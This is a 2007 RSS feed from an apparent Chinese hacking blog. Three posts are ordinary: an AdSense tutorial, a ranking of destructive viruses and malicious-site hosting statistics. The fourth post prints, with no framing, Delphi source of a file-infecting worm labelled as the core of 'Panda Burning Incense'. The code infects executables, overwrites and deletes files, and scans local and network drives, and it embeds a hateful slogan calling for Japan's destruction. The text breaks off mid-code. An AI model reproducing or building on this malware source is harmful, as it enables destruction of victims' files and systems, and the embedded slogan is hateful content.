﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>IT博客网-YIYE黑客技术</title><link>http://www.cnitblog.com/yiye/</link><description>全部由YIYE原创！</description><language>zh-cn</language><lastBuildDate>Mon, 01 Dec 2008 22:44:18 GMT</lastBuildDate><pubDate>Mon, 01 Dec 2008 22:44:18 GMT</pubDate><ttl>60</ttl><item><title>巧用博客挂Google Adsense广告赚美元</title><link>http://www.cnitblog.com/yiye/archive/2007/05/22/27449.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Tue, 22 May 2007 09:17:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/22/27449.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27449.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/22/27449.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27449.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27449.html</trackback:ping><description><![CDATA[<span class=oblog_text>&nbsp;
<p>许多个人网站站长申请了google adsense广告，在自己的网站挂上广告，让流量变成美元。 现在又流行开博客，据说国内博客数量已有数百万个。许多博客的访问量也是惊人的，例如老徐的博客总流量已经超过千万。那么，能不能让博客也帮我们赚钱呢？</p>
<p>经过摸索，我发现小法宝博客也可以挂google adsense广告，哈哈，爽吧，可以靠博客赚美元了！</p>
<p>首页左侧，以及每个文章页面的底部等，都可以放置google adsense广告。 你也想利用博客来赚广告费吗？跟我一起来吧！</p>
<p>首先介绍一下，在博客挂google adsense广告需要具备的条件： 1.你需要有一个博客（废话）。 2.你需要已经申请google adsense，并获批准。 如果你还没有申请，请到点击本站首页的&#8220;通过Google Adsense使您的网站产生收益&#8221;图标去申请。 3.将代码和你的大作一起上传到你的博客并大力推广，使尽可能多的网友浏览你的博客。 </p>
<p>接下来介绍具体的实现步骤： 第一步：登陆google adsense后台，生成广告代码。小法宝博客首页左侧的广告，最合适的广告形式是&#8220;摩天大楼&#8221;（160*600）。 复制代码到记事本，保存为.htm文件，文件名任取，例如google.htm。 然后把这个文件上传到你的网站空间里，你要弄清楚这个文件的实际URL地址，下一步的代码中将通过这个URL地址来调用google adsense广告代码。 第二步：登陆博客控制面板，在左侧菜单中点击&#8220;首页内容维护&#8221;，进入&#8220;自定义空白面板&#8221;，点击&#8220;新增&#8221;，为面板取一个标题，例如&#8220;google广告&#8221;，注意要勾选&#8220;显示源代码&#8221;，然后在内容框中输入代码：&lt;IFRAME align=center marginWidth=0 marginHeight=0 src="广告代码URL地址" <br>frameBorder=0 width=160 scrolling=no height=600&gt;&lt;/IFRAME&gt; <br>，之后点&#8220;保存&#8221;。 第三步：在控制面板左侧菜单中点击&#8220;定制我的首页&#8221;，在随后的弹出页中点击&#8220;添加模块&#8221;，勾选上一步新增的&#8220;google广告&#8221;面板，单击&#8220;选取&#8221;）。 这时，已经看到google adsense广告的初貌了，不过，它是出现在左侧最下方的，你可把它移动到&#8220;活动地带&#8221;的下方。 最后点&#8220;保存设置&#8221;，快到首页去看看，google adsense广告已经显示在首页了。 </p>
<p>文章页面也可添加google adsense广告。只要在google adsense后台生成一个468*60或其它形式的广告代码，然后将代码文件上传到你自己的网站空间，最后在每个文章源代码的合适合位置加入以下代码即可：&lt;IFRAME src="广告代码URL地址" align=center marginWidth=0 marginHeight=0 frameBorder=0 scrolling=no width=468 height=60&gt;&lt;/IFRAME&gt; 。</p>
<p>注意：1.只有使用Word编辑器的才能显示源代码，因此，使用UBB编辑器环境下发表的文章中无法添加google adsense广告。 2.根据google adsense许可政策，无论首页还是次页，每个页面最多只能加入3个广告位，因此，请不要将广告加在文章顶部，否则你的博客首页中，每篇文章顶部的广告都会显示。</p>
</span>
<img src ="http://www.cnitblog.com/yiye/aggbug/27449.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-22 17:17 <a href="http://www.cnitblog.com/yiye/archive/2007/05/22/27449.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>PC历史上10大最具破坏力病毒排行出炉</title><link>http://www.cnitblog.com/yiye/archive/2007/05/21/27422.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Mon, 21 May 2007 15:37:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/21/27422.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27422.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/21/27422.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27422.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27422.html</trackback:ping><description><![CDATA[<p>中国IT产业社区网站Techweb根据多方面评估，评出了20年来破坏力最大的10种计算机病毒：</p>
<p>&nbsp;1. <strong>CIH（1998年）</strong>感染Win95/98中的可行性文件，这种病毒在Windows环境下传播，其实时性和隐蔽性都特别强，变种可以重写BIOS.大约在世界范围内造成了两千万到八千万美元的损失。</p>
<p>&nbsp;2.<strong>梅利莎（Melissa，1999年）</strong>Melissa病毒是一种迅速传播的宏病毒，它作为电子邮件的附件进行传播，尽管Melissa病毒不会毁坏文件或其它资源，但是它可能会使企业或其它邮件服务端程序停止运行，因为它发出大量的邮件形成了极大的电子邮件信息流。1999年3月26日爆发，感染了15%-20%的商业<a onclick="javascript:tagshow(event, '%B5%E7%C4%D4');" href="javascript:;" target=_self><u><strong><font color=#000066>电脑</font></strong></u></a>，带来了三千万到六千万美元的损失。</p>
<p>&nbsp;3.<strong>爱虫（I <a onclick="javascript:tagshow(event, 'love');" href="javascript:;" target=_self><u><strong><font color=#000066>love</font></strong></u></a> you，2000年）</strong>和Melissa一样通过电子邮件传播，而其破坏性要比Melissa强的多，可以删除本地部分<a onclick="javascript:tagshow(event, '%CD%BC%C6%AC');" href="javascript:;" target=_self><u><strong><font color=#000066>图片</font></strong></u></a>和文本，大约造成了一千万到一千五百万美元的损失。</p>
<p>&nbsp;4.<strong>红色代码（Code Red，2001年）</strong>Code Red是一种蠕虫病毒，本质上是利用了缓存区溢出攻击方式，使用服务器的端口80进行传播，而这个端口正是Web服务器与浏览器进行信息交流的渠道。与其它病毒不同的是，Code Red并不将病毒信息写入被攻击服务器的硬盘，它只是驻留在被攻击服务器的内存中。大约在世界范围内造成了二百八十万美元的损失。</p>
<p>&nbsp;5. <strong>SQL Slammer（2003年）</strong>Slammer是一款DDOS恶意程序，透过一种全新的传染途径，采取分布式阻断服务攻击感染服务器，它利用SQL Server弱点采取阻断服务攻击1434端口并在内存中感染SQL Server，通过被感染的SQL Server再大量的散播阻断服务攻击与感染，造成SQL Server无法正常作业或宕机，使内部网络拥塞。和Code Red一样，它只是驻留在被攻击服务器的内存中。大约在世界范围内造成了五十万台服务器当机，让韩国整个网络瘫痪了12个小时。</p>
<p>&nbsp;6.<strong>冲击波（Blaster，2003年）</strong>冲击波病毒是利用微软公司在当年7月21日公布的RPC漏洞进行传播的，只要是计算机上有RPC服务并且没有打<a onclick="javascript:tagshow(event, '%B0%B2%C8%AB');" href="javascript:;" target=_self><u><strong><font color=#000066>安全</font></strong></u></a>补丁的计算机都存在有RPC漏洞，该病毒感染<a onclick="javascript:tagshow(event, '%CF%B5%CD%B3');" href="javascript:;" target=_self><u><strong><font color=#000066>系统</font></strong></u></a>后，会使计算机产生下列现象：系统资源被大量占用，有时会弹出RPC服务终止的对话框，并且系统反复重启，不能收发邮件、不能正常复制文件、无法正常浏览网页，复制粘贴等操作受到严重影响，DNS和IIS服务遭到非法拒绝等。这个病毒该是近期国内比较熟悉一个大范围影响的病毒了。大约造成了二百万到一千万美元的损失，而事实上受影响的电脑则是成千上万，不计其数。</p>
<p>&nbsp;7.<strong>大无极。F（Sobig.F，2003年）</strong>这是Sobig蠕虫的第5个变种，具有非常强的感染能力，因此将会发生庞大的电子邮件传输，使全球各地的电子邮件服务器当机，由于其特性，还将会极其危险的泄漏本地数据。大约造成了五百万到一千万美元的损失，有超过一百万台电脑受感染。</p>
<p>&nbsp;8.<strong>贝革热（Bagle，2004年）</strong>Bagle也被称为Beagle，是一种透过电子邮件散布的蠕虫病毒，它通过远程访问网站利用电子邮件系统进行散布，并在Windows系统建立backdoor，至今为止，这个蠕虫可能是程度最严重，传播范围最广泛的蠕虫病毒，其影响仍然处于上升趋势。目前已经造成了上千万美元的损失，而且仍然在继续。</p>
<p>&nbsp;9. <strong>MyDoom（2004年）</strong>该病毒采用的是病毒和垃圾邮件相结合的战术，可以迅速在企业电子邮件系统中传播开来，导致邮件数量暴增，从而阻塞网络。不管是病毒还是垃圾邮件，无论哪一样在去年都给用户造成了足够多的烦恼，而如今这两者的结合更是来势凶猛，再加上大多数用户对此并不知情，使得这种病毒的传播速度突破了原来的各种病毒的传播速度。根据MessageLabs调查公司的数据显示，在MyDoom病毒发作的高峰时刻，每10封邮件中就有一封被此种病毒感染，而对于前一年肆虐的Sobig病毒，每17封邮件中才会有一封邮件被感染。在其爆发最严重的时候，让全球的网络速度大幅度价低。</p>
<p>&nbsp;10.<strong>震荡波（Sasser，2004年）</strong>震荡波病毒会在网络上自动搜索系统有漏洞的电脑，并直接引导这些电脑下载病毒文件并执行，因此整个传播和发作过程不需要人为干预。只要这些用户的电脑没有安装补丁程序并接入互联网，就有可能被感染。这样子的发作特点很像当年的冲击波，会让系统文件崩溃，造成电脑反复重启。目前已经造成了上千万美元的损失。</p>
<img src ="http://www.cnitblog.com/yiye/aggbug/27422.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-21 23:37 <a href="http://www.cnitblog.com/yiye/archive/2007/05/21/27422.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>全球九大病毒寄居地 </title><link>http://www.cnitblog.com/yiye/archive/2007/05/21/27418.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Mon, 21 May 2007 14:52:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/21/27418.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27418.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/21/27418.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27418.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27418.html</trackback:ping><description><![CDATA[<div>据英国著名安全软件厂商sophos日前公布的调查报告显示，今年第一季度，中国和美国依然托管着全球大部分恶意网站。而中国托管的恶意网站上的病毒数量占到了全球的41.1%，高居榜首。 </div>
<div>&nbsp;&nbsp;&nbsp; 今年第一季度，sophos每天平均发现5000个新感染页面。其中，大部分含有病毒的网站均由中国和美国托管。今年3月份，中国的托管比例为35.6%，美国为32.3%。但整个第一季度，中国的托管比例上升到41.1%，而美国为29.2%。以下为今年第一季度恶意网站九大托管国家： </div>
<div align=left>&nbsp;&nbsp; 1. 中国（41.1%） </div>
<div align=left>&nbsp;&nbsp; 2. 美国 （29.2%） </div>
<div align=left>&nbsp;&nbsp; 3. 俄罗斯 （4.6%） </div>
<div align=left>&nbsp;&nbsp; 4. 德国 （4.6%） </div>
<div align=left>&nbsp;&nbsp; 5. 乌克兰 （3.9%） </div>
<div align=left>&nbsp;&nbsp; 6. 英国 （3.0%） </div>
<div align=left>&nbsp;&nbsp; 7. 法国 （2.2%） </div>
<div align=left>&nbsp;&nbsp; 8. 荷兰 （1.9%） </div>
<div align=left>&nbsp;&nbsp; 9. 韩国 （1.3%）<br></div>
<img src ="http://www.cnitblog.com/yiye/aggbug/27418.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-21 22:52 <a href="http://www.cnitblog.com/yiye/archive/2007/05/21/27418.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>熊猫烧香核心代码 </title><link>http://www.cnitblog.com/yiye/archive/2007/05/21/27417.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Mon, 21 May 2007 14:51:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/21/27417.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27417.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/21/27417.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27417.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27417.html</trackback:ping><description><![CDATA[<span class=oblog_text>program&nbsp;japussy;<br>uses<br>windows,&nbsp;sysutils,&nbsp;classes,&nbsp;graphics,&nbsp;shellapi{,&nbsp;registry};<br>const<br>headersize&nbsp;=&nbsp;82432;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//病毒体的大小<br>iconoffset&nbsp;=&nbsp;$12eb8;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//pe文件主图标的偏移量<br><br>//在我的delphi5&nbsp;sp1上面编译得到的大小，其它版本的delphi可能不同<br>//查找2800000020的十六进制字符串可以找到主图标的偏移量<br>&nbsp;&nbsp;<br>{<br>headersize&nbsp;=&nbsp;38912;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//upx压缩过病毒体的大小<br>iconoffset&nbsp;=&nbsp;$92bc;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//upx压缩过pe文件主图标的偏移量<br><br>//upx&nbsp;1.24w&nbsp;用法:&nbsp;upx&nbsp;-9&nbsp;--8086&nbsp;japussy.exe<br>}<br>iconsize&nbsp;&nbsp;&nbsp;=&nbsp;$2e8;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//pe文件主图标的大小--744字节<br>icontail&nbsp;&nbsp;&nbsp;=&nbsp;iconoffset&nbsp;+&nbsp;iconsize;&nbsp;//pe文件主图标的尾部<br>id&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;$44444444;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//感染标记<br><br>//垃圾码，以备写入<br>catchword&nbsp;=&nbsp;'if&nbsp;a&nbsp;race&nbsp;need&nbsp;to&nbsp;be&nbsp;killed&nbsp;out,&nbsp;it&nbsp;must&nbsp;be&nbsp;yamato.&nbsp;'&nbsp;+<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'if&nbsp;a&nbsp;country&nbsp;need&nbsp;to&nbsp;be&nbsp;destroyed,&nbsp;it&nbsp;must&nbsp;be&nbsp;japan!&nbsp;'&nbsp;+<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'***&nbsp;w32.japussy.worm.a&nbsp;***';<br>{$r&nbsp;*.res}<br>function&nbsp;registerserviceprocess(dwprocessid,&nbsp;dwtype:&nbsp;integer):&nbsp;integer;&nbsp;<br>stdcall;&nbsp;external&nbsp;'kernel32.dll';&nbsp;//函数声明<br>var<br>tmpfile:&nbsp;string;<br>si:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;startupinfo;<br>pi:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;process_information;<br>isjap:&nbsp;&nbsp;&nbsp;boolean&nbsp;=&nbsp;false;&nbsp;//日文操作系统标记<br>{&nbsp;判断是否为win9x&nbsp;}<br>function&nbsp;iswin9x:&nbsp;boolean;<br>var<br>ver:&nbsp;tosversioninfo;<br>begin<br>result&nbsp;:=&nbsp;false;<br>ver.dwosversioninfosize&nbsp;:=&nbsp;sizeof(tosversioninfo);<br>if&nbsp;not&nbsp;getversionex(ver)&nbsp;then<br>&nbsp;&nbsp;exit;<br>if&nbsp;(ver.dwplatformid&nbsp;=&nbsp;ver_platform_win32_windows)&nbsp;then&nbsp;//win9x<br>&nbsp;&nbsp;result&nbsp;:=&nbsp;true;<br>end;<br>{&nbsp;在流之间复制&nbsp;}<br>procedure&nbsp;copystream(src:&nbsp;tstream;&nbsp;sstartpos:&nbsp;integer;&nbsp;dst:&nbsp;tstream;<br>dstartpos:&nbsp;integer;&nbsp;count:&nbsp;integer);<br>var<br>scurpos,&nbsp;dcurpos:&nbsp;integer;<br>begin<br>scurpos&nbsp;:=&nbsp;src.position;<br>dcurpos&nbsp;:=&nbsp;dst.position;<br>src.seek(sstartpos,&nbsp;0);<br>dst.seek(dstartpos,&nbsp;0);<br>dst.copyfrom(src,&nbsp;count);<br>src.seek(scurpos,&nbsp;0);<br>dst.seek(dcurpos,&nbsp;0);<br>end;<br>{&nbsp;将宿主文件从已感染的pe文件中分离出来，以备使用&nbsp;}<br>procedure&nbsp;extractfile(filename:&nbsp;string);<br>var<br>sstream,&nbsp;dstream:&nbsp;tfilestream;<br>begin<br>try<br>&nbsp;&nbsp;sstream&nbsp;:=&nbsp;tfilestream.create(paramstr(0),&nbsp;fmopenread&nbsp;or&nbsp;fmsharedenynone);<br>&nbsp;&nbsp;try<br>&nbsp;&nbsp;&nbsp;&nbsp;dstream&nbsp;:=&nbsp;tfilestream.create(filename,&nbsp;fmcreate);<br>&nbsp;&nbsp;&nbsp;&nbsp;try<br>&nbsp;&nbsp;&nbsp;&nbsp;sstream.seek(headersize,&nbsp;0);&nbsp;//跳过头部的病毒部分<br>&nbsp;&nbsp;&nbsp;&nbsp;dstream.copyfrom(sstream,&nbsp;sstream.size&nbsp;-&nbsp;headersize);<br>&nbsp;&nbsp;&nbsp;&nbsp;finally<br>&nbsp;&nbsp;&nbsp;&nbsp;dstream.free;<br>&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;finally<br>&nbsp;&nbsp;&nbsp;&nbsp;sstream.free;<br>&nbsp;&nbsp;end;<br>except<br>end;<br>end;<br>{&nbsp;填充startupinfo结构&nbsp;}<br>procedure&nbsp;fillstartupinfo(var&nbsp;si:&nbsp;startupinfo;&nbsp;state:&nbsp;word);<br>begin<br>si.cb&nbsp;:=&nbsp;sizeof(si);<br>si.lpreserved&nbsp;:=&nbsp;nil;<br>si.lpdesktop&nbsp;:=&nbsp;nil;<br>si.lptitle&nbsp;:=&nbsp;nil;<br>si.dwflags&nbsp;:=&nbsp;startf_useshowwindow;<br>si.wshowwindow&nbsp;:=&nbsp;state;<br>si.cbreserved2&nbsp;:=&nbsp;0;<br>si.lpreserved2&nbsp;:=&nbsp;nil;<br>end;<br>{&nbsp;发带毒邮件&nbsp;}<br>procedure&nbsp;sendmail;<br>begin<br>//哪位仁兄愿意完成之？<br>end;<br>{&nbsp;感染pe文件&nbsp;}<br>procedure&nbsp;infectonefile(filename:&nbsp;string);<br>var<br>hdrstream,&nbsp;srcstream:&nbsp;tfilestream;<br>icostream,&nbsp;dststream:&nbsp;tmemorystream;<br>iid:&nbsp;longint;<br>aicon:&nbsp;ticon;<br>infected,&nbsp;ispe:&nbsp;boolean;<br>i:&nbsp;integer;<br>buf:&nbsp;array[0..1]&nbsp;of&nbsp;char;<br>begin<br>try&nbsp;//出错则文件正在被使用，退出<br>&nbsp;&nbsp;if&nbsp;comparetext(filename,&nbsp;'japussy.exe')&nbsp;=&nbsp;0&nbsp;then&nbsp;//是自己则不感染<br>&nbsp;&nbsp;&nbsp;&nbsp;exit;<br>&nbsp;&nbsp;infected&nbsp;:=&nbsp;false;<br>&nbsp;&nbsp;ispe&nbsp;&nbsp;&nbsp;:=&nbsp;false;<br>&nbsp;&nbsp;srcstream&nbsp;:=&nbsp;tfilestream.create(filename,&nbsp;fmopenread);<br>&nbsp;&nbsp;try<br>&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;i&nbsp;:=&nbsp;0&nbsp;to&nbsp;$108&nbsp;do&nbsp;//检查pe文件头<br>&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;srcstream.seek(i,&nbsp;sofrombeginning);<br>&nbsp;&nbsp;&nbsp;&nbsp;srcstream.read(buf,&nbsp;2);<br>&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(buf[0]&nbsp;=&nbsp;#80)&nbsp;and&nbsp;(buf[1]&nbsp;=&nbsp;#69)&nbsp;then&nbsp;//pe标记<br>&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ispe&nbsp;:=&nbsp;true;&nbsp;//是pe文件<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br>&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;&nbsp;&nbsp;srcstream.seek(-4,&nbsp;sofromend);&nbsp;//检查感染标记<br>&nbsp;&nbsp;&nbsp;&nbsp;srcstream.read(iid,&nbsp;4);<br>&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(iid&nbsp;=&nbsp;id)&nbsp;or&nbsp;(srcstream.size&nbsp;&lt;&nbsp;10240)&nbsp;then&nbsp;//太小的文件不感染<br>&nbsp;&nbsp;&nbsp;&nbsp;infected&nbsp;:=&nbsp;true;<br>&nbsp;&nbsp;finally<br>&nbsp;&nbsp;&nbsp;&nbsp;srcstream.free;<br>&nbsp;&nbsp;end;<br>&nbsp;&nbsp;if&nbsp;infected&nbsp;or&nbsp;(not&nbsp;ispe)&nbsp;then&nbsp;//如果感染过了或不是pe文件则退出<br>&nbsp;&nbsp;&nbsp;&nbsp;exit;<br>&nbsp;&nbsp;icostream&nbsp;:=&nbsp;tmemorystream.create;<br>&nbsp;&nbsp;dststream&nbsp;:=&nbsp;tmemorystream.create;<br>&nbsp;&nbsp;try<br>&nbsp;&nbsp;&nbsp;&nbsp;aicon&nbsp;:=&nbsp;ticon.create;<br>&nbsp;&nbsp;&nbsp;&nbsp;try<br>&nbsp;&nbsp;&nbsp;&nbsp;//得到被感染文件的主图标(744字节)，存入流<br>&nbsp;&nbsp;&nbsp;&nbsp;aicon.releasehandle;<br>&nbsp;&nbsp;&nbsp;&nbsp;aicon.handle&nbsp;:=&nbsp;extracticon(hinstance,&nbsp;pchar(filename),&nbsp;0);<br>&nbsp;&nbsp;&nbsp;&nbsp;aicon.savetostream(icostream);<br>&nbsp;&nbsp;&nbsp;&nbsp;finally<br>&nbsp;&nbsp;&nbsp;&nbsp;aicon.free;<br>&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;&nbsp;&nbsp;srcstream&nbsp;:=&nbsp;tfilestream.create(filename,&nbsp;fmopenread);<br>&nbsp;&nbsp;&nbsp;&nbsp;//头文件<br>&nbsp;&nbsp;&nbsp;&nbsp;hdrstream&nbsp;:=&nbsp;tfilestream.create(paramstr(0),&nbsp;fmopenread&nbsp;or&nbsp;fmsharedenynone);<br>&nbsp;&nbsp;&nbsp;&nbsp;try<br>&nbsp;&nbsp;&nbsp;&nbsp;//写入病毒体主图标之前的数据<br>&nbsp;&nbsp;&nbsp;&nbsp;copystream(hdrstream,&nbsp;0,&nbsp;dststream,&nbsp;0,&nbsp;iconoffset);<br>&nbsp;&nbsp;&nbsp;&nbsp;//写入目前程序的主图标<br>&nbsp;&nbsp;&nbsp;&nbsp;copystream(icostream,&nbsp;22,&nbsp;dststream,&nbsp;iconoffset,&nbsp;iconsize);<br>&nbsp;&nbsp;&nbsp;&nbsp;//写入病毒体主图标到病毒体尾部之间的数据<br>&nbsp;&nbsp;&nbsp;&nbsp;copystream(hdrstream,&nbsp;icontail,&nbsp;dststream,&nbsp;icontail,&nbsp;headersize&nbsp;-&nbsp;icontail);<br>&nbsp;&nbsp;&nbsp;&nbsp;//写入宿主程序<br>&nbsp;&nbsp;&nbsp;&nbsp;copystream(srcstream,&nbsp;0,&nbsp;dststream,&nbsp;headersize,&nbsp;srcstream.size);<br>&nbsp;&nbsp;&nbsp;&nbsp;//写入已感染的标记<br>&nbsp;&nbsp;&nbsp;&nbsp;dststream.seek(0,&nbsp;2);<br>&nbsp;&nbsp;&nbsp;&nbsp;iid&nbsp;:=&nbsp;$44444444;<br>&nbsp;&nbsp;&nbsp;&nbsp;dststream.write(iid,&nbsp;4);<br>&nbsp;&nbsp;&nbsp;&nbsp;finally<br>&nbsp;&nbsp;&nbsp;&nbsp;hdrstream.free;<br>&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;finally<br>&nbsp;&nbsp;&nbsp;&nbsp;srcstream.free;<br>&nbsp;&nbsp;&nbsp;&nbsp;icostream.free;<br>&nbsp;&nbsp;&nbsp;&nbsp;dststream.savetofile(filename);&nbsp;//替换宿主文件<br>&nbsp;&nbsp;&nbsp;&nbsp;dststream.free;<br>&nbsp;&nbsp;end;<br>except;<br>end;<br>end;<br>{&nbsp;将目标文件写入垃圾码后删除&nbsp;}<br>procedure&nbsp;smashfile(filename:&nbsp;string);<br>var<br>filehandle:&nbsp;integer;<br>i,&nbsp;size,&nbsp;mass,&nbsp;max,&nbsp;len:&nbsp;integer;<br>begin<br>try<br>&nbsp;&nbsp;setfileattributes(pchar(filename),&nbsp;0);&nbsp;//去掉只读属性<br>&nbsp;&nbsp;filehandle&nbsp;:=&nbsp;fileopen(filename,&nbsp;fmopenwrite);&nbsp;//打开文件<br>&nbsp;&nbsp;try<br>&nbsp;&nbsp;&nbsp;&nbsp;size&nbsp;:=&nbsp;getfilesize(filehandle,&nbsp;nil);&nbsp;//文件大小<br>&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;:=&nbsp;0;<br>&nbsp;&nbsp;&nbsp;&nbsp;randomize;<br>&nbsp;&nbsp;&nbsp;&nbsp;max&nbsp;:=&nbsp;random(15);&nbsp;//写入垃圾码的随机次数<br>&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;max&nbsp;&lt;&nbsp;5&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;max&nbsp;:=&nbsp;5;<br>&nbsp;&nbsp;&nbsp;&nbsp;mass&nbsp;:=&nbsp;size&nbsp;div&nbsp;max;&nbsp;//每个间隔块的大小<br>&nbsp;&nbsp;&nbsp;&nbsp;len&nbsp;:=&nbsp;length(catchword);<br>&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;i&nbsp;&lt;&nbsp;max&nbsp;do<br>&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;fileseek(filehandle,&nbsp;i&nbsp;*&nbsp;mass,&nbsp;0);&nbsp;//定位<br>&nbsp;&nbsp;&nbsp;&nbsp;//写入垃圾码，将文件彻底破坏掉<br>&nbsp;&nbsp;&nbsp;&nbsp;filewrite(filehandle,&nbsp;catchword,&nbsp;len);<br>&nbsp;&nbsp;&nbsp;&nbsp;inc(i);<br>&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;finally<br>&nbsp;&nbsp;&nbsp;&nbsp;fileclose(filehandle);&nbsp;//关闭文件<br>&nbsp;&nbsp;end;<br>&nbsp;&nbsp;deletefile(pchar(filename));&nbsp;//删除之<br>except<br>end;<br>end;<br>{&nbsp;获得可写的驱动器列表&nbsp;}<br>function&nbsp;getdrives:&nbsp;string;<br>var<br>disktype:&nbsp;word;<br>d:&nbsp;char;<br>str:&nbsp;string;<br>i:&nbsp;integer;<br>begin<br>for&nbsp;i&nbsp;:=&nbsp;0&nbsp;to&nbsp;25&nbsp;do&nbsp;//遍历26个字母<br>begin<br>&nbsp;&nbsp;d&nbsp;:=&nbsp;chr(i&nbsp;+&nbsp;65);<br>&nbsp;&nbsp;str&nbsp;:=&nbsp;d&nbsp;+&nbsp;':\';<br>&nbsp;&nbsp;disktype&nbsp;:=&nbsp;getdrivetype(pchar(str));<br>&nbsp;&nbsp;//得到本地磁盘和网络盘<br>&nbsp;&nbsp;if&nbsp;(disktype&nbsp;=&nbsp;drive_fixed)&nbsp;or&nbsp;(disktype&nbsp;=&nbsp;drive_remote)&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;result&nbsp;:=&nbsp;result&nbsp;+&nbsp;d;<br>end;<br>end;<br>{&nbsp;遍历目录，感染和摧毁文件&nbsp;}<br>procedure&nbsp;loopfiles(path,&nbsp;mask:&nbsp;string);<br>var<br>i,&nbsp;count:&nbsp;integer;<br>fn,&nbsp;ext:&nbsp;string;<br>subdir:&nbsp;tstrings;<br>searchrec:&nbsp;tsearchrec;<br>msg:&nbsp;tmsg;<br>function&nbsp;isvaliddir(searchrec:&nbsp;tsearchrec):&nbsp;integer;<br>begin<br>&nbsp;&nbsp;if&nbsp;(searchrec.attr&nbsp;&lt;&gt;&nbsp;16)&nbsp;and&nbsp;(searchrec.name&nbsp;&lt;&gt;&nbsp;'.')&nbsp;and<br>&nbsp;&nbsp;&nbsp;&nbsp;(searchrec.name&nb